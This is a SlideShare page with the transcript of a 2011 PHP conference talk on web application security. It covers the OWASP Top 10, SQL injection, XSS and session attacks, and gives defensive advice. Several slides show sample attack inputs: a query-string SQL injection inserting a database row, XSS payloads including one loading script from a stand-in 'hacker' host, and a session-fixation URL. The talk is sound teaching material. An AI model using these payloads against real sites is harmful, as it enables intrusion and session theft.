Your SlideShare is downloading. ×
0
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Phpnw security-20111009
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Phpnw security-20111009

1,194

Published on

Sharing our agency experience of developing secure web applications for some of the UK's leading high street banks and brands with a focus on the pitfalls you face when developing code in PHP. The …

Sharing our agency experience of developing secure web applications for some of the UK's leading high street banks and brands with a focus on the pitfalls you face when developing code in PHP. The talk will contain specific details on the many attack vectors that hackers will use to attempt to access and exploit your site and how you can improve your development process to avoid them.
Topics covered will include some old chestnuts like XSS (Cross Site Scripting) and SQL injection through to issues like aSession Hijacking.
The talk is aimed at developers who have perhaps not truly considered security of their applications before to developers who would like to extend their knowledge. The talk is aimed at software developers and will contain practical code-based examples and solutions.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,194
On Slideshare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
20
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  • Transcript

    1. Are you feeling secure – notes from the trenches Paul Lemon @anthonylime http://joind.in/3603
    2. Introduction <ul><li>- I am a web developer and have been for 13 years </li></ul><ul><li>- Former sound engineer to the obscure and poor </li></ul><ul><li>- Technical Director at MadeByPi </li></ul><ul><li>- I love what I do </li></ul><ul><li>PHP / Java / Actionscript / Javascript / C# </li></ul><ul><li>Wear a mean hairnet </li></ul>About me
    3. “ The problem of insecure software is perhaps the most important technical challenge of our time.” – OWASP Testing Guide Introduction. Photo courtesy http://www.flickr.com/photos/katescars/
    4. Introduction <ul><li>- Notes based on personal professional experience </li></ul><ul><li>Over 20+ third party tests on our applications </li></ul><ul><li>Development orientated </li></ul><ul><li>Simple code examples – not production code. </li></ul>This presentation
    5. Introduction <ul><ul><ul><ul><ul><li>Open Web Application Security Project </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Best resource for developers / analysts / testers </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>https://www.owasp.org / </li></ul></ul></ul></ul></ul>OWASP
    6. Introduction <ul><ul><ul><ul><ul><li>SQL Injection </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Cross-Site Scripting (XSS) </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Broken Authentication and Session Management </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Insecure Direct Object References </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Cross-Site Request Forgery (CSRF) </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Security Misconfiguration </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Insecure Cryptographic Storage </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Failure to Restrict URL Access </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Insufficient Transport Layer Protection </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Unvalidated Redirects and Forwards </li></ul></ul></ul></ul></ul>OWASP Top 10
    7. Introduction <ul><ul><ul><ul><ul><li>SQL Injection </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Cross-Site Scripting (XSS) </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Broken Authentication and Session Management </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Insecure Direct Object References </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Cross-Site Request Forgery (CSRF) </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Security Misconfiguration </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Insecure Cryptographic Storage </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Failure to Restrict URL Access </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Insufficient Transport Layer Protection </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Unvalidated Redirects and Forwards </li></ul></ul></ul></ul></ul>OWASP Top 10
    8. SQL Injection http://www.flickr.com/photos/andresrueda/2983149263/
    9. Injection http://xkcd.com/327/
    10. Injection http://someserver/script.php?id=1;INSERT INTO members ('email','passwd','login_id','full_name')VALUES ('paul.lemon@gmail.com','hello',‘paul',’Paul Lemon'); Sample Code
    11. Injection <ul><ul><ul><ul><ul><li>Confidential data can be disclosed </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>The results of the query may not visible in the HTML </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Trial and error to iterate data in tables </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Execute long running queries </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Test for errors in page execution </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Vulnerable to inserts / updates / defacement </li></ul></ul></ul></ul></ul>How is it exploited
    12. Injection Validation and Parameterised Query
    13. Injection <ul><ul><ul><ul><ul><li>- Validate all input. </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Use PDO to create parameterised queries or </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Use a ORM or Database Library (not your own!) </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Set up your database permissions. </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Don’t expose your queries (logging etc) </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Code review </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Don’t be complacent </li></ul></ul></ul></ul></ul>How to prevent
    14. Injection <ul><ul><ul><ul><ul><li>Validation is not just for the user’s benefit </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Cast to correct type i.e. intval / floatval / boolean </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Whitelist Input ranges </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>- Reasonable minimums and maximums </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>- Whitelist with regular expression </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>- Blacklist with regular expression </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>- Validate Email / Urls </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>- Don’t rely on your model layer </li></ul></ul></ul></ul></ul>A quick note about validation
    15. XSS http://www.flickr.com/photos/andresrueda/2983149263/
    16. XSS http://someserver/script.php?name=<script>alert();</script> or http://bit.ly/lYMcHjkj Sample XSS
    17. XSS http:// host/script.php?name=<script src='http://hacker/script.js' /> Sample XSS
    18. XSS Potential Exploits - Theft of session cookies - Insertion of content / forms etc - Redirection to malicious sites - Insertion of trojan downloads / keyloggers etc.
    19. XSS <ul><li>Varieties of XSS </li></ul><ul><li>Persistent - data is stored in the database </li></ul><ul><li>Nonpersistent - injected code is present in the URL/Request </li></ul><ul><li>DOM Based - javascript executed in the page reads the request </li></ul>
    20. XSS Trusted Not Trusted <ul><li>Posted Form </li></ul><ul><li>Querystring </li></ul><ul><li>Url </li></ul><ul><li>Cookies </li></ul><ul><li>HTTP Headers </li></ul>Web application Browser
    21. XSS – Trust zones Trusted Not Trusted API <ul><li>Use HTTPS </li></ul><ul><li>Treat as user input </li></ul>Web application
    22. XSS – Trust zones Trusted Not Trusted Database <ul><li>Database may have been compromised </li></ul><ul><li>Validation may have failed </li></ul><ul><li>Escape all output </li></ul>Web application
    23. XSS – Trust zones Trusted Not Trusted API Database Web application Browser
    24. XSS – Trust zones Trusted Not Trusted API Database Your application should be modular too Web application Browser
    25. XSS Escape all output <ul><ul><ul><ul><ul><li>ENT_QUOTES option is important – double and single quotes </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Page encoding is important </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>If you need HTML output use HTML Purifier </li></ul></ul></ul></ul></ul>
    26. XSS Escape all output – context is important
    27. XSS ?name=<script>alert(&quot;hello&quot;);</script>& link=javascript:alert('hello') Escape all output – context is important
    28. XSS ?name=<script>alert(&quot;hello&quot;);</script>& link=javascript:alert('hello') Escape all output – context is important
    29. XSS
    30. XSS <ul><ul><ul><ul><ul><li>Check your templating engine for XSS protection (options in Symfony 1/ Twig for escaping by default) </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Context is important to the escaping used - Image and Hyperlinks - Javascript blocks </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>- CSS </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>There is not a definitive solution for PHP </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>https://www.owasp.org/index.php/ESAPI#tab=PHP  </li></ul></ul></ul></ul></ul>Preventing XSS
    31. XSS <ul><ul><ul><ul><ul><li>Session cookie to use HTTPOnly in php.ini </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Or use PHP function session_set_cookie_params </li></ul></ul></ul></ul></ul>Cookies set as HTTPOnly
    32. Session Exploits
    33. Session Exploits <ul><ul><ul><ul><ul><li>Session Fixation </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Man in the middle attacks </li></ul></ul></ul></ul></ul>Overview
    34. Session Exploits <ul><ul><ul><ul><ul><li>Allowing the session id to be passed on the querystring </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Url is sent via email to potential victim </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>visit this url to the site http://localhost/?sessionid=1234 </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Victim logs in and this is attached to the session id </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Sender uses the original session id and gains access </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>http://localhost/viewprofile?sessionid=1234 </li></ul></ul></ul></ul></ul>Session Fixation
    35. Session Exploits <ul><ul><ul><ul><ul><li>Do not allow session id to be passed on the querystring </li></ul></ul></ul></ul></ul>Session Fixation – How to prevent
    36. Session Exploits <ul><ul><ul><ul><li>Where the attacker has access to the machine </li></ul></ul></ul></ul><ul><ul><ul><ul><li>- First user notes down the session id on the computer </li></ul></ul></ul></ul><ul><ul><ul><ul><li>- Second user logs in and this is attached to the session id </li></ul></ul></ul></ul><ul><ul><ul><ul><li>- First user uses the original session id and gains access </li></ul></ul></ul></ul>Session Fixation
    37. Session Exploits <ul><ul><ul><ul><ul><li>Roll the session id when a user logs in </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>You can change the session id more frequently… </li></ul></ul></ul></ul></ul>Session Fixation – How to prevent
    38. Session Exploits Man in the middle attacks User logs in… Session Id - Cookie HTTP POST Web application Username / Password
    39. Session Exploits Man in the middle attacks User logs in… Session Id - Cookie HTTP POST Ahoy! Web application Username / Password
    40. Session Exploits Man in the middle attacks Username / Password User logs in… Session Id - Cookie HTTP S POST Web application
    41. Session Exploits <ul><ul><ul><ul><ul><li>- Login and authentication must always be over HTTPS </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Passwords are personal and confidential </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Users are not disciplined </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>(Store your passwords securely SHA1 / Salt ) </li></ul></ul></ul></ul></ul>Man in the middle attacks
    42. Session Exploits Man in the middle attacks User visits a non-secure page Resource downloaded HTTP GET Session Id - Cookie Web application Username / Password User logs in… Session Id - Cookie HTTP S POST Web application
    43. Session Exploits Man in the middle attacks User visits a non-secure page Resource downloaded HTTP GET Session Id - Cookie Web application Username / Password User logs in… Session Id - Cookie HTTP S POST Web application
    44. Session Exploits <ul><ul><ul><ul><ul><li>Authenticated session cookies should be delivered over SSL </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Use HTTPS only option on session cookie </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Use a separate domain if you can e.g. https://admin.yoursite/ </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Use a separate path for your session cookie </li></ul></ul></ul></ul></ul>Man in the middle attacks
    45. Session Exploits Man in the middle attacks
    46. Session Exploits Man in the middle attacks
    47. Session Exploits Man in the middle attacks User visits a non-secure page Resource downloaded HTTP GET Web application Username / Password User logs in… Session Id - Cookie HTTP S POST Web application
    48. Session Exploits Man in the middle attacks User visits a non-secure page Resource downloaded HTTP GET Curses! Web application Username / Password User logs in… Session Id - Cookie HTTP S POST Web application
    49. Session Exploits Man in the middle attacks <ul><ul><ul><ul><ul><li>Sometimes you cannot limit session to HTTPS </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Users can log in and see non-secure data in public pages </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>There are still secure areas of the site </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Use two cookies </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Or make the user login again </li></ul></ul></ul></ul></ul>
    50. Session Exploits Username / Password User logs in… Session Id – Cookie SECURE HTTP S POST Open Zone of Web application User visits a non-secure page Resource downloaded HTTP GET Session Id Extra Auth – Cookie SECURE Web application
    51. Session Exploits Username / Password User logs in… Session Id – Cookie SECURE HTTP S POST Secure Zone of Web application User visits a non-secure page Response HTTP S GET/POST/PUT Session Id Extra Auth – Cookie SECURE Extra Auth – Cookie Web application
    52. XSRF
    53. XSRF – Sorry no time
    54. Conclusions
    55. Conclusions Get someone else to do the work
    56. Conclusions <ul><ul><ul><ul><ul><li>Use a framework. I like symfony. </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Use a well supported platform / CMS </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Check their response to security issues </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>If there is no solution – check again (and again) </li></ul></ul></ul></ul></ul>Get someone else to do the work
    57. Conclusions <ul><ul><ul><ul><ul><li>- Expect there to be faults – test as much as you can. </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Expect there to be attacks – monitor your site </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Stay on top of your versions – PHP / MySQL etc </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Input validation is critical </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Code for quality / Unit tests / regression </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Code review </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Operate with least privilege </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Establish a build and deployment script </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>Read OWASP </li></ul></ul></ul></ul></ul>Recommendations
    58. <ul><li>XSS cheatlist: http://ha.ckers.org/xss.html </li></ul><ul><li>OWASP: https://www.owasp.org/index.php/Main_Page </li></ul><ul><li>HTML Purifier: http://htmlpurifier.org/ </li></ul><ul><li>Context aware templates: http://googleonlinesecurity.blogspot.com/2009/03/reducing-xss-by-way-of-automatic.html </li></ul><ul><li>MadeByPi: http://www.madebypi.co.uk </li></ul>Conclusions Resources
    59. Are you feeling secure – notes from the trenches Paul Lemon @anthonylime – paul.lemon@gmail.com http://joind.in/3603

    ×